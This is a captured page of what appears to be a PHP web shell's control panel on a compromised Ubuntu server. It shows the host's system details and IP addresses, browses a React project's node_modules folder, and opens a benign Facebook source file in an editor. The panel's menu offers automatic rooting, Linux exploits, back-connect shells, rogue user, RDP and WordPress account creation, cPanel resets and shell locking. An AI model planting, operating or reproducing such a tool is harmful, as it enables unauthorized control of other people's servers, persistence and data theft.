Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
react-dev-utils /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
FileSizeReporter.js
4.5
KB
-rw-rw-rw-
ForkTsCheckerWarningWebpackPlu...
823
B
-rw-rw-rw-
ForkTsCheckerWebpackPlugin.js
321
B
-rw-rw-rw-
InlineChunkHtmlPlugin.js
1.88
KB
-rw-rw-rw-
InterpolateHtmlPlugin.js
1.41
KB
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
ModuleNotFoundPlugin.js
4.19
KB
-rw-rw-rw-
ModuleScopePlugin.js
3.39
KB
-rw-rw-rw-
README.md
13.27
KB
-rw-rw-rw-
WebpackDevServerUtils.js
13.12
KB
-rw-rw-rw-
browsersHelper.js
2.45
KB
-rw-rw-rw-
chalk.js
254
B
-rw-rw-rw-
checkRequiredFiles.js
856
B
-rw-rw-rw-
clearConsole.js
365
B
-rw-rw-rw-
crossSpawn.js
270
B
-rw-rw-rw-
errorOverlayMiddleware.js
732
B
-rw-rw-rw-
eslintFormatter.js
2.74
KB
-rw-rw-rw-
evalSourceMapMiddleware.js
1.52
KB
-rw-rw-rw-
formatWebpackMessages.js
4.17
KB
-rw-rw-rw-
getCSSModuleLocalIdent.js
1.24
KB
-rw-rw-rw-
getCacheIdentifier.js
584
B
-rw-rw-rw-
getProcessForPort.js
1.98
KB
-rw-rw-rw-
getPublicUrlOrPath.js
2.02
KB
-rw-rw-rw-
globby.js
257
B
-rw-rw-rw-
ignoredFiles.js
467
B
-rw-rw-rw-
immer.js
254
B
-rw-rw-rw-
launchEditor.js
19.02
KB
-rw-rw-rw-
launchEditorEndpoint.js
330
B
-rw-rw-rw-
noopServiceWorkerMiddleware.js
1.33
KB
-rw-rw-rw-
openBrowser.js
4.32
KB
-rw-rw-rw-
openChrome.applescript
2.59
KB
-rw-rw-rw-
package.json
2.31
KB
-rw-rw-rw-
printBuildError.js
1.2
KB
-rw-rw-rw-
printHostingInstructions.js
3.62
KB
-rw-rw-rw-
redirectServedPathMiddleware.j...
747
B
-rw-rw-rw-
refreshOverlayInterop.js
447
B
-rw-rw-rw-
webpackHotDevClient.js
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getCSSModuleLocalIdent.js
/** * Copyright (c) 2015-present, Facebook, Inc. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ 'use strict'; const loaderUtils = require('loader-utils'); const path = require('path'); module.exports = function getLocalIdent( context, localIdentName, localName, options ) { // Use the filename or folder name, based on some uses the index.js / index.module.(css|scss|sass) project style const fileNameOrFolder = context.resourcePath.match( /index\.module\.(css|scss|sass)$/ ) ? '[folder]' : '[name]'; // Create a hash based on a the file location and class name. Will be unique across a project, and close to globally unique. const hash = loaderUtils.getHashDigest( path.posix.relative(context.rootContext, context.resourcePath) + localName, 'md5', 'base64', 5 ); // Use loaderUtils to find the file or folder name const className = loaderUtils.interpolateName( context, fileNameOrFolder + '_' + localName + '__' + hash, options ); // Remove the .module that appears in every classname when based on the file and replace all "." with "_". return className.replace('.module_', '_').replace(/\./g, '_'); };
Close